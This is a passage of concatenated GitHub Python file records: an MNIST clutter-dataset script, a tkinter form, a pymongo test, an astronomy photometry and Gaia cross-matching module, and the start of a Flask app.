np.array(np.load(trainingData), 
dtype = np.float32).reshape(-1, 1, 28, 28)\n Y_train = np.array(np.load(trainingLabel), dtype = np.uint8)\n X_test = np.array(np.load(testingData), dtype = np.float32).reshape(-1, 1, 28, 28)\n Y_test = np.array(np.load(testingLabel), dtype = np.uint8)\n\n return X_train, Y_train, X_test, Y_test\ndef rotateImage(image, angle):\n if len(image.shape) == 3:\n image = image[0]\n image_center = tuple(np.array(image.shape)/2)\n rot_mat = cv2.getRotationMatrix2D(image_center,angle,1.0)\n result = cv2.warpAffine(image, rot_mat, image.shape,flags=cv2.INTER_LINEAR)\n return np.array(result[np.newaxis, :, :], dtype = np.float32)\n\n\ndef extend_image(inputs, images = None, mega_patch_w=8, size=40, num_strokes=5):\n if len(inputs.shape) == 3:\n inputs = inputs.reshape(inputs.shape[0], 1, inputs.shape[1], inputs.shape[2])\n\n if images is None:\n images = inputs[np.random.randint(low = 0, high = inputs.shape[0], size = 100)]\n\n num_samples = inputs.shape[0]\n image_size, image_channel, image_w, image_h = images.shape\n\n extended_images_with_clutter = np.zeros((inputs.shape[0], 1, size, size), dtype = np.float32)\n extended_images = np.zeros((inputs.shape[0], 1, size, size), dtype = np.float32)\n\n margin_size = (size - inputs.shape[2]) / 2\n for i in range(inputs.shape[0]):\n\n for j in range(num_strokes):\n intensity = 0\n t_y = np.random.randint(size - mega_patch_w)\n t_x = np.random.randint(size - mega_patch_w)\n patch = np.zeros((mega_patch_w, mega_patch_w))\n while(intensity < 12):\n index = np.random.randint(image_size)\n s_y = np.random.randint(image_w - mega_patch_w)\n s_x = np.random.randint(image_h - mega_patch_w)\n patch = images[index, 0, s_x:s_x + mega_patch_w, s_y:s_y + mega_patch_w]\n intensity = np.sum(patch)\n extended_images_with_clutter[i, 0, t_x:t_x + mega_patch_w, t_y:t_y + mega_patch_w] = patch\n \n #margin_x = np.random.randint(0, size - inputs.shape[2])\n #margin_y = np.random.randint(0, size - inputs.shape[3])\n x_value_index = np.where(np.sum(inputs[i, 0], axis = 1) != 0)[0]\n y_value_index = np.where(np.sum(inputs[i, 0], axis = 0) != 0)[0]\n\n x_left = x_value_index[0]\n x_right = x_value_index[-1]\n x_length = x_right - x_left + 1\n y_left = y_value_index[0]\n y_right = y_value_index[-1]\n y_length = y_right - y_left + 1\n\n margin_x = np.random.randint(0, size - x_length)\n margin_y = np.random.randint(0, size - y_length)\n\n extended_images[i, :, margin_x:margin_x + x_length, margin_y:margin_y + y_length] = inputs[i, :, x_left: x_left + x_length, y_left: y_left + y_length]\n extended_images_with_clutter[i, :, margin_x:margin_x + x_length, margin_y:margin_y + y_length] = inputs[i, :, x_left : x_left + x_length, y_left: y_left + y_length]\n \n return extended_images, extended_images_with_clutter\n\n\n\n\nX_train, y_train, X_test, y_test = load_data(\"/X_train.npy\", \"/Y_train.npy\", \"/X_test.npy\", \"/Y_test.npy\")\n#X_test = extend_image(X_test, 40)\n#X_train = extend_image(X_train, 40)\n\ntrain_size = y_train.shape[0]\nall_images = []\nall_labels = []\nfor j in range(1):\n angles_1 = list(np.random.randint(low = -90, high = 0, size = train_size // 2))\n angles_2 = list(np.random.randint(low = 0, high = 90, size = train_size // 2))\n angles = np.array(angles_1 + angles_2)\n np.random.shuffle(angles)\n rotated_image = np.array([rotateImage(X_train[i], angles[i]) for i in range(train_size)], dtype = np.float32)\n all_images.append(rotated_image)\n all_labels.append(y_train)\n#all_images = np.vstack(all_images)\n#all_labels = np.hstack(all_labels)\nall_images = 
X_train\nall_labels = y_train\n\nprint(all_images.shape, all_labels.shape)\n\nindex = np.arange(1 * train_size)\nnp.random.shuffle(index)\n\nall_images = all_images[index]\nall_labels = all_labels[index]\n\n\n\nx_train, x_train_cluttered = extend_image(all_images, size = 60)\ny_train = all_labels\n\ntest_size = y_test.shape[0]\nall_images = []\nall_labels = []\nfor j in range(1):\n angles_1 = list(np.random.randint(low = -90, high = 0, size = test_size // 2))\n angles_2 = list(np.random.randint(low = 0, high = 90, size = test_size // 2))\n angles = np.array(angles_1 + angles_2)\n np.random.shuffle(angles)\n rotated_image = np.array([rotateImage(X_test[i], angles[i]) for i in range(test_size)], dtype = np.float32)\n all_images.append(rotated_image)\n all_labels.append(y_test)\n#all_images = np.vstack(all_images)\nall_images = X_test\n#all_labels = np.hstack(all_labels)\nall_labels = y_test\n\nprint(all_images.shape, all_labels.shape)\n\nindex = np.arange(1 * test_size)\nnp.random.shuffle(index)\n\nall_images = all_images[index]\nall_labels = all_labels[index]\n\n\n\nx_test, x_test_cluttered = extend_image(all_images, size = 60)\ny_test = all_labels\n\nnp.savez(\"/phddata/jiajun/Research/mnist/mnist_60_shift_cluttered.npz\", x_train = x_train, y_train = y_train, x_test = x_test, y_test=y_test, x_train_cluttered = x_train_cluttered, x_test_cluttered = x_test_cluttered)\n\n","repo_name":"jiajunshen/MultipleDetection","sub_path":"create_shift_MNIST_dataset_60_with_clutter.py","file_name":"create_shift_MNIST_dataset_60_with_clutter.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"75047824466","text":"import tkinter as tk\n\n\nclass App(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master.title(\"ウィンドウのタイトル\")\n\n self.pack()\n self.create_widget1()\n\n def create_widget1(self):\n\n self.label1 = tk.Label(self.master, text=\"ユーザー情報を入力してください\", padx=50)\n self.label1.pack(padx=5, pady=5)\n\n items = [\"氏名\", \"生年月日\", \"電話番号\", \"メールアドレス\"]\n\n def fetch(entries):\n for entry in entries:\n item = entry[0]\n text = entry[1].get()\n print('{}: {}'.format(item, text))\n\n def makeform(self, items):\n entries = []\n for item in items:\n row = tk.Frame(self.master)\n label = tk.Label(row, text=item)\n entry = tk.Entry(row)\n\n row.pack(side=tk.TOP, fill=tk.X, padx=5, pady=5)\n label.pack(side=tk.LEFT)\n entry.pack(side=tk.RIGHT, fill=tk.X)\n entries.append((item, entry))\n\n return entries\n\n ents = makeform(self, items)\n\n self.button1 = tk.Button(self.master, text=\"確認\", command=(lambda e=ents: fetch(e)))\n self.button1.pack(side=tk.LEFT, padx=5, pady=5)\n\n self.button2 = tk.Button(self.master, text=\"終了\", command=self.master.quit)\n self.button2.pack(side=tk.LEFT, padx=5, pady=5)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = App(master=root)\n app.mainloop()\n","repo_name":"yokamoto5742/pythongui","sub_path":"python_gui_secondstep/531.py","file_name":"531.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36426074036","text":"import requests\nimport re\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nimport json\nfrom bs4 import BeautifulSoup\nimport pymongo\n\nMONGO_URL = 'localhost'\nMONGO_DB = 'toutiao'\nMONGO_TABLE = 'test1'\n\nclient = pymongo.MongoClient('localhost')\ndb = client['trip']\n\n\n# 
client=pymongo.MongoClient(MONGO_URL)\nclient=pymongo.MongoClient(MONGO_URL,connect=False)\ndb=client[MONGO_DB]\n\ndef get_result(offset,keyword):\n    data={\n        'offset': offset,\n        'keyword': keyword\n    }\n\ndef main():\n    data={\n        'id': 1,\n        'keyword': 'kw'\n    }\n\n    # for i in range(10):\n    #     data['id']=str(i)\n    #     print(data)\n    #     db[MONGO_TABLE].insert(data)\n    #     print('存储到MongoDB成功', data)\n    db[MONGO_TABLE].insert(data)\n    # for i in range(10):\n    #     if db[MONGO_TABLE].insert(result):\n    #         print(i)\n    #         print('存储到MongoDB成功', result)\n    #         return True\n    # return False\n\nif __name__ == '__main__':\n    main()\n","repo_name":"gitstudy8/hellobi-pythonStudy2","sub_path":"TouTiao-master/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39917161334","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport os,sys\n \nfrom astropy.coordinates import SkyCoord\n\n\nfrom astropy.table import Table\nfrom astropy import units as u\nfrom astropy.io import ascii,fits\n\nimport sfdmap\n\n\n###########################################\ndef get_ebv(allspec):\n\n    DEIMOS_RAW = os.getenv('DEIMOS_RAW')\n\n    sdf_ext = sfdmap.SFDMap(DEIMOS_RAW+'SFDmaps/')\n    EBV = sdf_ext.ebv(allspec['RA'],allspec['DEC'])\n\n    allspec['EBV'] = EBV\n\n    Ar = 2.751 * allspec['EBV']\n    Ag = 3.793 * allspec['EBV']\n\n\n    return allspec, Ar, Ag\n    \n\n###########################################\ndef calc_MV_star(allspec,obj):\n    \n    # DISTANCE MODULUS AND REDDENING\n    dmod = 5.*np.log10(obj['Dist_kpc']*1e3) - 5.\n\n\n    # Jester 2005\n    # https://classic.sdss.org/dr5/algorithms/sdssUBVRITransform.php \n    # V = g - 0.59*(g-r) - 0.01 \n    #V = allspec['gmag_o'] - 0.59*gr_o -0.01\n    # Jordi 2006\n    # V = allspec['gmag_o'] - 0.565*gr_o -0.016\n    # Using Lupton\n    # V = g - 0.5784*(g - r) - 0.0038; sigma = 0.0054\n\n    gr_o = allspec['gmag_o'] - allspec['rmag_o'] \n    V = allspec['gmag_o'] - 0.565*gr_o -0.016\n\n    allspec['MV_o'] = V - dmod\n    \n    return allspec\n\n###########################################\ndef calc_rproj(allspec,obj):\n\n    sc_gal = SkyCoord(obj['RA'],obj['Dec'], unit=(u.deg, u.deg),distance = obj['Dist_kpc']*u.kpc)\n\n\n    # CALCULATE STAR RADIUS FROM OBJECT CENTER\n    sc_all = SkyCoord(allspec['RA'],allspec['DEC'], unit=(u.deg, u.deg),distance = obj['Dist_kpc']*u.kpc)\n\n    sep = sc_all.separation(sc_gal)\n    allspec['rproj_arcm'] = sep.arcmin\n\n    sep3d = sc_all.separation_3d(sc_gal)\n    allspec['rproj_kpc'] = sep3d.kpc \n\n\n    return allspec\n\n###########################################\ndef CaT_to_FeH(alldata):\n    \n    FeH = -99\n    FeH_err = -99\n    \n    \n    m = (alldata['MV_o'] != -99) & (alldata['ew_cat'] > 0.)\n    \n\n    mag = alldata['MV_o'][m]\n    CaT = alldata['ew_cat'][m]\n    CaTerr = alldata['ew_cat_err'][m]\n\n    # #######Carrera 2013##########\n    # [value, error] using M_V\n    a = [-3.45,0.04]\n    b = [0.16,0.01]\n    c = [0.41,0.004]\n    d = [-0.53,0.11]\n    e = [0.019, 0.002]\n    FeH = a[0] + b[0]* mag + c[0]*CaT + d[0]*CaT**(-1.5) + e[0]*CaT*mag\n\n    # PROPAGATE ERRORS -- ASSUME NO ERROR ON MAGNITUDE FOR NOW...\n    FeH_err = np.sqrt( (a[1]**2) +\\\n                       (mag**2*b[1]**2) +\\\n                       (c[1]**2*CaT**2 + c[0]**2*CaTerr**2) +\\\n                       (d[1]**2*CaT**(-1.5*2) + (1.5*d[0])**2*(CaTerr**2)*CaT**(-5)) +\\\n                       (e[1]**2*(CaT*mag)**2 + CaTerr**2*(e[0]*mag)**2))\n\n    \n    alldata['ew_feh'][m] = FeH\n    alldata['ew_feh_err'][m] = FeH_err\n\n    return alldata\n\n###########################################\ndef match_gaia(obj,allspec):\n\n    DEIMOS_RAW = os.getenv('DEIMOS_RAW')\n    gaia_file = DEIMOS_RAW + 
'/Gaia_DR3/gaia_dr3_'+obj['Name2']+'.csv'\n\n \n if not os.path.isfile(gaia_file):\n print('NO GAIA FILE',gaia_file)\n\n \n if os.path.isfile(gaia_file):\n\n gaia = Table.read(gaia_file)\n \n\n cgaia = SkyCoord(ra=gaia['ra']*u.degree, dec=gaia['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cgaia) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n mt2 = idx[d2d < 1.*u.arcsec]\n allspec['gaia_source_id'][mt] = gaia['source_id'][mt2]\n allspec['gaia_pmra'][mt] = gaia['pmra'][mt2] \n allspec['gaia_pmra_err'][mt] = gaia['pmra_error'][mt2]\n allspec['gaia_pmdec'][mt] = gaia['pmdec'][mt2] \n allspec['gaia_pmdec_err'][mt] = gaia['pmdec_error'][mt2]\n allspec['gaia_parallax'][mt] = gaia['parallax'][mt2] \n allspec['gaia_parallax_err'][mt] = gaia['parallax_error'][mt2]\n allspec['gaia_rv'][mt] = gaia['radial_velocity'][mt2] \n allspec['gaia_rv_err'][mt] = gaia['radial_velocity_error'][mt2] \n\n allspec['gaia_aen'][mt] = gaia['astrometric_excess_noise'][mt2] \n allspec['gaia_aen_sig'][mt] = gaia['astrometric_excess_noise_sig'][mt2]\n\n\n # SET NON_DETECTED BACK TO DEFAULT\n # GAIA DEFAULTS ARE ZERO (CONFUSING!)\n m = allspec['gaia_pmra_err'] == 0.0\n allspec['gaia_pmra'][m] = -999.\n m = allspec['gaia_pmdec_err'] == 0.0\n allspec['gaia_pmdec'][m] = -999.\n m = allspec['gaia_parallax_err'] == 0.0\n allspec['gaia_parallax'][m] = -999.\n mrv = allspec['gaia_rv'] == 0.0\n allspec['gaia_rv'][mrv] = -999.\n nrv = np.sum(allspec['gaia_rv'] > -999.)\n\n # SET GAIA FLAG \n m = allspec['gaia_pmra'] > -999\n allspec['flag_gaia'][m] = 1\n\n print('GAIA: Matched {} stars and {} Gaia RVS'.format(np.size(mt),nrv))\n\n\n return allspec\n\n###########################################\n###########################################\ndef match_photometry(obj,allspec):\n \n DEIMOS_RAW = os.getenv('DEIMOS_RAW')\n\n # POPULATE EBV\n allspec, Ar, Ag = get_ebv(allspec)\n nall = np.size(allspec)\n nobj = np.sum(allspec['v_err'] >= 0)\n nstar = np.sum(allspec['v_err'] > 0)\n\n\n #####################\n ### MUNOZ -- COMPLETE UNPUBLISHED CATALOGS\n if obj['Phot'] == 'munozf':\n \n file = DEIMOS_RAW + '/Photometry/munoz_full/final_'+obj['Name2']+'.phot'\n\n munozf = ascii.read(file)\n munozf.rename_column('col2', 'RA')\n munozf.rename_column('col3', 'DEC')\n munozf.rename_column('col4', 'g')\n munozf.rename_column('col5', 'gerr')\n munozf.rename_column('col6', 'r')\n munozf.rename_column('col7', 'rerr')\n\n \n if (obj['Name2'] == 'Eri') | (obj['Name2'] == 'K2')| (obj['Name2'] == 'Leo2')| \\\n (obj['Name2'] == 'Seg2') | (obj['Name2'] == 'N2419')| (obj['Name2'] == 'Pal2'):\n munozf['RA'] *= 15.\n \n cmunf = SkyCoord(ra=munozf['RA']*u.degree, dec=munozf['DEC']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cmunf) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = munozf['r'][idx[d2d < 1.*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = munozf['g'][idx[d2d < 1.*u.arcsec]] - Ag[mt]\n allspec['rmag_err'][mt] = munozf['rerr'][idx[d2d < 1.*u.arcsec]]\n allspec['gmag_err'][mt] = munozf['gerr'][idx[d2d < 1.*u.arcsec]]\n\n allspec['phot_source'][mt] = 'munozf'\n \n\n \n #####################\n ### MUNOZ -- COMPLETE UNPUBLISHED CATALOGS\n if obj['Phot'] == 'munoz18_2':\n \n file = DEIMOS_RAW + '/Photometry/munoz18/munoz18_secondary.txt'\n\n munozf = ascii.read(file)\n\n cmunf = 
SkyCoord(ra=munozf['ra']*u.degree, dec=munozf['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cmunf) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = munozf['r'][idx[d2d < 1.*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = munozf['g'][idx[d2d < 1.*u.arcsec]] - Ag[mt]\n allspec['rmag_err'][mt] = munozf['rerr'][idx[d2d < 1.*u.arcsec]]\n allspec['gmag_err'][mt] = munozf['gerr'][idx[d2d < 1.*u.arcsec]]\n \n allspec['phot_source'][mt] = 'munoz18_2'\n\n\n #####################\n ### GC SDSS PHOTOMETRY\n # http://classic.sdss.org/dr7/products/value_added/anjohnson08_clusterphotometry.html\n if obj['Phot'] == 'sdss_gc':\n file = DEIMOS_RAW + '/Photometry/sdss_gc/sdss_gc_'+obj['Name2']+'.phot'\n sdss = ascii.read(file)\n \n sdss.rename_column('col5', 'RA')\n sdss.rename_column('col6', 'DEC')\n sdss.rename_column('col16', 'gmag')\n sdss.rename_column('col17', 'gmag_err')\n sdss.rename_column('col23', 'rmag')\n sdss.rename_column('col24', 'rmag_err')\n\n \n csdss = SkyCoord(ra=sdss['RA']*u.degree, dec=sdss['DEC']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(csdss) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = sdss['rmag'][idx[d2d < 1.*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = sdss['gmag'][idx[d2d < 1.*u.arcsec]] - Ag[mt]\n allspec['rmag_err'][mt] = sdss['rmag_err'][idx[d2d < 1.*u.arcsec]]\n allspec['gmag_err'][mt] = sdss['gmag_err'][idx[d2d < 1.*u.arcsec]]\n\n allspec['phot_source'][mt] = 'sdss_gc'\n\n\n\n #####################\n ### LEGACY DR10\n if obj['Phot'] == 'ls_dr10':\n file = DEIMOS_RAW + '/Photometry/legacy_DR10/dr10_'+obj['Name2']+'.csv'\n ls_dr10 = ascii.read(file)\n \n ls_dr10.rename_column('dered_mag_g', 'gmag')\n ls_dr10.rename_column('dered_mag_r', 'rmag')\n\n # CORRECT BASS MAGNITUDES NORTHERN MAGNITUDES\n if np.median(ls_dr10['dec'] > 34.):\n ls_dr10['rmag'] = -0.0382 * (ls_dr10['gmag'] - ls_dr10['rmag']) + 0.0108 + ls_dr10['rmag']\n\n \n cls_dr10 = SkyCoord(ra=ls_dr10['ra']*u.degree, dec=ls_dr10['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_dr10) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = ls_dr10['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = ls_dr10['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n allspec['phot_source'][mt] = 'ls_dr10'\n\n\n ###########################\n if obj['Phot'] == 'ls_dr10i':\n file = DEIMOS_RAW + '/Photometry/legacy_DR10/dr10_'+obj['Name2']+'.csv'\n ls_dr10 = ascii.read(file)\n \n # hack, if rmag isn't available\n gmag = ls_dr10['dered_mag_g']\n rmag = ls_dr10['dered_mag_i'] + 0.3\n\n\n cls_dr10 = SkyCoord(ra=ls_dr10['ra']*u.degree, dec=ls_dr10['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_dr10) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = rmag[idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = gmag[idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n \n allspec['phot_source'][mt] = 'ls_dr10'\n\n ### DELVE\n if obj['Phot'] == 'delve':\n file = DEIMOS_RAW + 
'/Photometry/delve/delve_'+obj['Name2']+'.csv'\n delve = Table.read(file)\n \n \n cls_dr10= SkyCoord(ra=delve['RA']*u.degree, dec=delve['DEC']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_dr10) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = delve['rmag_o'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = delve['gmag_o'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = delve['rmag_err'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_err'][mt] = delve['rmag_err'][idx[d2d < 1.*u.arcsec]] \n\n allspec['phot_source'][mt] = 'delve'\n\n\n ## PANSTARRS DR2\n # https://catalogs.mast.stsci.edu/\n if obj['Phot'] == 'PanS':\n file = DEIMOS_RAW + '/Photometry/PanS/PanS_'+obj['Name2']+'.csv'\n pans = ascii.read(file)\n m=(pans['rMeanPSFMag'] != -999) & (pans['gMeanPSFMag'] != -999)\n pans=pans[m]\n \n # TRANSFORM TO SDSS USING Tonry et al 2012\n gr_p = pans['gMeanPSFMag'] - pans['rMeanPSFMag']\n g_sdss = pans['gMeanPSFMag'] + 0.013 + 0.145*gr_p + 0.019*gr_p**2\n r_sdss = pans['rMeanPSFMag'] - 0.001 + 0.004*gr_p + 0.007*gr_p**2\n \n cpans = SkyCoord(ra=pans['raMean']*u.degree, dec=pans['decMean']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cpans) \n foo = np.arange(0,np.size(idx),1)\n\n # INCREASED TO 2\" TO GET CENTRAL GLOBULAR CLUSTER MEMBERS\n ds = 2.0\n mt = foo[d2d < ds*u.arcsec]\n allspec['rmag_o'][mt] = r_sdss[idx[d2d < ds*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = g_sdss[idx[d2d < ds*u.arcsec]] - Ag[mt]\n \n allspec['rmag_err'][mt] = pans['rMeanPSFMagErr'][idx[d2d < ds*u.arcsec]]\n allspec['gmag_err'][mt] = pans['gMeanPSFMagErr'][idx[d2d < ds*u.arcsec]]\n\n allspec['phot_source'][mt] = 'PanS'\n\n \n #####################\n ### USE GAIA IF THERE ARE NO OTHER OPTIONS\n if obj['Phot'] == 'gaia':\n file = DEIMOS_RAW + '/Gaia_DR3/gaia_dr3_'+obj['Name2']+'.csv'\n gaia = ascii.read(file)\n \n # TRANSFORM USING Table 5.7\n #https://gea.esac.esa.int/archive/documentation/GDR3/Data_processing/chap_cu5pho/cu5pho_sec_photSystem/cu5pho_ssec_photRelations.html#Ch5.T8 \n\n G_BP_RP = gaia['bp_rp']\n G = gaia['phot_g_mean_mag']\n\n Gr = -0.09837 + 0.08592*G_BP_RP + 0.1907*G_BP_RP**2 - 0.1701*G_BP_RP**3 + 0.02263*G_BP_RP**4\n Gg = 0.2199 - 0.6365*G_BP_RP - 0.1548*G_BP_RP**2 + 0.0064*G_BP_RP**3\n rmag = G - Gr\n gmag = G - Gg\n err = (2.5/np.log(10)) / gaia['phot_g_mean_flux_over_error']\n gaia_err = np.sqrt(err**2 + 0.07**2)\n\n # TRANSFORMATION IS TOTALLY OFF\n rmag = gaia['phot_rp_mean_mag']\n gmag = gaia['phot_g_mean_mag']-0.3\n\n\n cgaia = SkyCoord(ra=gaia['ra']*u.degree, dec=gaia['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cgaia) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = rmag[idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = gmag[idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = gaia_err[idx[d2d < 1.*u.arcsec]] \n allspec['gmag_err'][mt] = gaia_err[idx[d2d < 1.*u.arcsec]] \n\n allspec['phot_source'][mt] = 'gaia'\n\n ### HST\n if obj['Phot'] == 'hst':\n file = DEIMOS_RAW + '/Photometry/hst/hst_'+obj['Name2']+'.dat'\n hst = ascii.read(file)\n \n hst.rename_column('F606', 'gmag')\n hst.rename_column('F814', 'rmag')\n cls_hst = SkyCoord(ra=hst['RA']*u.degree, dec=hst['Dec']*u.degree) \n\n\n cdeimos = 
SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_hst) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = hst['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = hst['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n ### HST - ACS\n if obj['Phot'] == 'ACS':\n file = DEIMOS_RAW + '/Photometry/hst/hst_'+obj['Name2']+'.fits'\n hst = Table.read(file)\n # REMOVE SUPER FAINT STARS\n m=hst['F814W_VEGA'] > 25\n hst=hst[m]\n\n hst.rename_column('F475W_VEGA', 'gmag')\n hst.rename_column('F814W_VEGA', 'rmag')\n cls_hst = SkyCoord(ra=hst['RA']*u.degree, dec=hst['DEC']*u.degree) \n\n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_hst) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = hst['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = hst['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n\n\n#####################\n ### PANDAS\n if obj['Phot'] == 'pandas':\n file = DEIMOS_RAW + '/Photometry/PANDAS/PANDAS_'+obj['Name2']+'.csv'\n pandas = ascii.read(file)\n \n pandas.rename_column('g', 'gmag')\n pandas.rename_column('i', 'rmag') # NEED TO TRANSFORM!!!\n pandas.rename_column('dg', 'gmag_err')\n pandas.rename_column('di', 'rmag_err')\n\n\n cpandas = SkyCoord(ra=pandas['RA']*u.degree, dec=pandas['Dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cpandas) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = pandas['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = pandas['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n allspec['phot_source'][mt] = 'pandas'\n\n \n\n#####################\n ### MASSEY\n if obj['Phot'] == 'massey':\n file = DEIMOS_RAW + '/Photometry/other/massey_2007.fits'\n massey = Table.read(file)\n\n massey['V-R'] = massey['Vmag'] - massey['V-R'] # CREATE R-mag\n massey.rename_column('Vmag', 'gmag')\n massey.rename_column('V-R', 'rmag') \n# massey.rename_column('dg', 'gmag_err')\n# massey.rename_column('di', 'rmag_err')\n massey['RAJ2000'] = np.array(massey['RAJ2000'])\n massey['DEJ2000'] = np.array(massey['DEJ2000'])\n\n cmassey = SkyCoord(ra=massey['RAJ2000']*u.degree, dec=massey['DEJ2000']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cmassey) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = massey['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = massey['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n \n\n\n\n # DETERMINE MV AND CONVERT CAT -> FEH\n m_miss_star = (allspec['rmag_o'] < 2) & (allspec['v_err'] > 0)\n print('PHOT: Matched {} stars, missing {} star targets'.format(np.size(mt),np.sum(m_miss_star)))\n\n allspec = calc_rproj(allspec,obj)\n allspec = calc_MV_star(allspec,obj)\n allspec = CaT_to_FeH(allspec)\n\n\n return 
allspec\n\n","repo_name":"marlageha/dmost","sub_path":"dmost/combine/dmost_photometry_gaia.py","file_name":"dmost_photometry_gaia.py","file_ext":"py","file_size_in_byte":18557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3246828476","text":"from flask import Flask, render_template, request, escape, redirect, url_for, session, flash\nfrom passlib.hash import sha256_crypt\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.utils import secure_filename\nimport os\nfrom random import randint\nimport zipfile\n\n\napp = Flask(__name__)\napp.secret_key = \"Tarang_is_secret_key\"\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"mysql+pymysql://root:vishu@127.0.0.1:3306/tarang\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Admin(db.Model):\n __tablename__= 'admin'\n id = 